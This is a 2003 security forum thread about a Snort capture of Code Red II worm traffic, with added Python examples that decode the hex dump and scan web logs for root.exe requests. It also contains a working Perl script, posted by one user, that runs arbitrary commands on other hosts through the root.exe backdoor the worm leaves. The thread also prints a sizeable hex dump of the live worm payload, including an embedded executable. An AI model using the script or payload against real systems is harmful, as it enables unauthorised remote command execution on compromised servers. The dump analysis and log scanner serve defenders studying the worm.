bsdjunkie
April 29th, 2003, 18:58
> 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
> TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
> ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20
> 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C
> 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U
> F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat
> 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_
> 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E.
> E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u.
> FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy
> 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U..
> 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL
> 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc
> 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E....
> 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u
> BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct
> 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E
> A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u
> BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele
> 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E.....
> 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E..
> 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U..
> 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna
> 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E.....
> 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname..
> 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA
> 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u.
> FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3
> 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E.....
> 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx..
> 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i...
> 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4....
> C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t.
> C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................
> E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................
> E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ......
> FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................
> FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y..
> 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........
> 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t..
> 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U..
> BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD.
> 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj....
> 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr
> 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe...
> 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j..
> 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\
> 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\
> 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe..
> 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U...
> 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP.........
> FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@...
> 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L
> 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%).........
> 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................
> 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ...
> 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@..............
> 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@...
> 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................
> 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ...............
> 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0...
> 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................
> 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`..
> 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... ....
> 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@.............
> 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............
> 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@.....
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h
> D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @..
> 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @..
> 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1
> 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j
> 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2...
> 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h
> 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@.......
> 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h
> 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h....
> E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L
> 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h
> B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5.
> 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j
> 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@...
> 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........
> 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h.
> 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@
> 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@..
> C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff.
> 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217....
> 40 00 89 35 @..5
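
Working through the dump above as an added example (this is not code from the thread; the indicator names are this example's own labels): the script rebuilds the payload bytes from the hex column, pulls printable strings the way `strings` would, and reports where the tell-tale artifacts sit. The embedded sample is a constructed, non-contiguous excerpt of the quoted dump, hex columns copied as printed and the ASCII column left in place so the parser has to ignore it.

```python
"""Walk a Snort packet dump the way an analyst would: recover the raw bytes
from the hex column, extract printable strings, flag known artifacts.

Added example for this thread, not code from the original post. SAMPLE_DUMP
is a constructed, non-contiguous excerpt of the dump quoted above."""
import re
from typing import Dict, List

SAMPLE_DUMP = r"""
> 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
> TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
> ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20
> 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C
> 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U
> 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL
> 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc
> 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E....
> 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U..
> BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD.
> 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj....
> 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr
> 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe...
> 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP.........
> FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@...
> 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L
> 40 00 89 35 @..5
"""

HEX_CHARS = set("0123456789abcdefABCDEF")


def _is_hex_pair(tok: str) -> bool:
    return len(tok) == 2 and all(c in HEX_CHARS for c in tok)


def parse_snort_dump(text: str) -> bytes:
    """Return payload bytes from a Snort '-d' style dump.

    Only the hex column is trusted: Snort prints 16 pairs per line and then
    an ASCII rendering, which copy/paste often mangles (the post has lines
    with extra dots). Header lines (timestamp, TCP flags) never start with a
    hex pair and are skipped. A full 16-pair line cannot be misread because
    the 17th token is always the ASCII column; only a short final line whose
    ASCII column happens to look like a hex pair is ambiguous.
    """
    payload = bytearray()
    for raw in text.splitlines():
        tokens = raw.lstrip("> ").split()
        pairs: List[str] = []
        for tok in tokens[:16]:
            if not _is_hex_pair(tok):
                break
            pairs.append(tok)
        payload.extend(int(p, 16) for p in pairs)
    return bytes(payload)


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable ASCII, same idea as the Unix strings tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


# Byte patterns worth flagging. root.exe is the renamed copy of cmd.exe that
# Code Red II leaves in two web-reachable directories; MZ and PE\0\0 mark an
# embedded Windows executable; WS2_32.DLL means the code does its own
# networking. Names are this example's own labels.
INDICATORS: Dict[str, bytes] = {
    "dos_mz_magic": rb"MZ",
    "pe_signature": rb"PE\x00\x00",
    "winsock_library": rb"WS2_32\.DLL",
    "cmd_exe_reference": rb"\\CMD\.EXE",
    "codered2_scripts_root_exe": rb"d:\\inetpub\\scripts\\root\.exe",
    "codered2_msadc_root_exe": rb"MSADC\\root\.exe",
}


def find_indicators(data: bytes) -> Dict[str, List[int]]:
    """Map each indicator to the byte offsets where it occurs (empty if absent)."""
    return {name: [m.start() for m in re.finditer(pat, data)]
            for name, pat in INDICATORS.items()}


def analyze(text: str) -> Dict[str, object]:
    data = parse_snort_dump(text)
    return {"payload_len": len(data),
            "strings": printable_strings(data),
            "indicators": find_indicators(data)}


if __name__ == "__main__":
    report = analyze(SAMPLE_DUMP)
    print(f"{report['payload_len']} payload bytes")
    for s in report["strings"]:
        print("  string:", s)
    for name, offsets in report["indicators"].items():
        if offsets:
            print(f"  {name}: at offset(s) {offsets}")
```

Reading the output: the API names (CloseHandle, WS2_32.DLL, socket and the rest in the full dump) say the code resolves Windows and Winsock functions by name at run time; \CMD.EXE right beside d:\inetpub\scripts\root.exe is the copy-to-backdoor step; MZ followed by PE\0\0 means a whole executable is being shipped inside the payload. On this capture the PE signature sits only 39 bytes after MZ, earlier than a real DOS header's e_lfanew field could even point, so treat MZ/PE here as string indicators rather than trying to parse the headers.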

soup4you2
April 29th, 2003, 21:04
CODE RED



**Snickers**

[code:1:505efea7a8]
#!/usr/bin/perl
# CodeGreen: asks a host to run a command through the root.exe
# backdoor that Code Red II leaves behind.
use strict;
use warnings;
use Socket;

my $port = 80;

#lets see if this is really vulnerable to this crap...
if ($#ARGV < 1) { die "Usage: CodeGreen IP command\n"; }
my $host    = $ARGV[0];
my $target  = inet_aton($host) or die "Cannot resolve $host\n";
my $command = $ARGV[1];

print "Executing [$command] on $host\n";
$command =~ s/ /%20/g;    # URL-encode spaces for the query string
my @results = sendraw("GET /scripts/root.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

sub sendraw {    # this saves the whole transaction anyway
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
        || die("Socket problems");
    # sockaddr_in builds the same address structure the original
    # packed by hand, without depending on the host's byte order
    if (connect(S, sockaddr_in($port, $target))) {
        my @in;
        select(S); $| = 1; print $pstr;
        while (<S>) { push @in, $_; }
        select(STDOUT); close(S); return @in;
    } else { die("Can't connect..."); }
}

[/code:1:505efea7a8]
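
The defender's side of the request the script above sends, as an added example that is not part of the thread: a scanner for web-server logs that picks out hits on either root.exe location from the packet dump, recovers the command text from the `/c+` query, and separates probes against clean hosts from answers that show the backdoor is really there. The log lines are constructed in Common Log Format with documentation-range addresses; `LOG_RE` would need adjusting for an IIS W3C log.

```python
"""Flag web-server requests aimed at the root.exe backdoor.

Added example, not from the thread. SAMPLE_LOG is constructed (Common Log
Format, 203.0.113.0/24 documentation addresses)."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

SAMPLE_LOG = """\
203.0.113.5 - - [25/Apr/2003:17:44:56 +0000] "GET /index.html HTTP/1.0" 200 1432
203.0.113.7 - - [25/Apr/2003:17:45:01 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
203.0.113.7 - - [25/Apr/2003:17:45:03 +0000] "GET /MSADC/root.exe?/c+dir%20c:%5C HTTP/1.0" 200 -
203.0.113.9 - - [25/Apr/2003:17:46:10 +0000] "HEAD /scripts/root.exe HTTP/1.0" 404 -
203.0.113.5 - - [25/Apr/2003:17:46:30 +0000] "GET /robots.txt HTTP/1.0" 404 -
"""

# host ident authuser [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# The two places the packet dump shows root.exe being written; IIS paths
# are case-insensitive, so match that way.
BACKDOOR_RE = re.compile(r"^/(scripts|msadc)/root\.exe(?:$|\?)", re.IGNORECASE)


def parse_backdoor_request(line: str) -> Optional[Dict[str, object]]:
    """Return an event dict for a root.exe request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m or not BACKDOOR_RE.match(m.group("path")):
        return None
    query = m.group("path").partition("?")[2]
    # The request form used above is root.exe?/c+<command> with spaces as
    # %20; decode it so the incident record shows what was asked for.
    command = unquote(query[len("/c+"):]) if query.startswith("/c+") else None
    status = int(m.group("status"))
    return {
        "src": m.group("src"),
        "time": m.group("ts"),
        "path": m.group("path"),
        "command": command,
        "status": status,
        # 404: nothing at that path, a probe against a clean host.
        # 200: something answered at that path, which on a normal IIS
        # host means the backdoor exists and the box is compromised.
        "backdoor_present": status == 200,
    }


def scan_log(text: str) -> List[Dict[str, object]]:
    """All root.exe events in a log, in file order."""
    events: List[Dict[str, object]] = []
    for line in text.splitlines():
        ev = parse_backdoor_request(line)
        if ev is not None:
            events.append(ev)
    return events


if __name__ == "__main__":
    for ev in scan_log(SAMPLE_LOG):
        state = "COMPROMISED" if ev["backdoor_present"] else "probe"
        print(f"{ev['time']} {ev['src']} {state} {ev['path']} command={ev['command']!r}")
```

Running this over a real log, the 200s are the lines to act on first; the 404s still tell you which sources are scanning for the backdoor, which is the same view the port-81 remark in the next reply is missing.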

bsdjunkie
April 29th, 2003, 21:13
hehe, yup, easy one that everyone sees every day I'm sure =)

soup4you2
April 29th, 2003, 21:27
actually since I'm on port 81 I don't see it at all.. I just did a google search for d:\inetpub\scripts\root.exe

bsdjunkie
April 29th, 2003, 22:17
google rules ;)

tarballed
April 30th, 2003, 16:54
Alright. Let me ask some questions.

First, is that a snort log?

Second, when you are breaking down these logs, what do you look for?

I am very curious and want to learn how to break down IDS logs so I can see what is happening.

Anyone care to bring me up to speed? :)

Tarballed

schotty
May 2nd, 2003, 15:17
I can't, but would like to second that motion of education. I want some too ;D I just have a godzillion of these gut feelings (some right, some wrong, some are to have a beer) that I just go with.

bsdjunkie
May 7th, 2003, 18:23
Ok, when I get home from work tonight I'll take an example packet and try to go through the process of figuring out what's going on.

bsdjunkie
May 12th, 2003, 22:20
Ok, sorry it's taken me a couple days to post again.... was trying to find an easy sample to explain, but then decided to do something a little different ;)

http://project.honeynet.org/scans/scan23/

The honeynet project has challenges to decode captures and figure out what happened in the traces. This is the Beginners Challenge. You all should check it out and try to solve it before looking at the solutions posted :roll: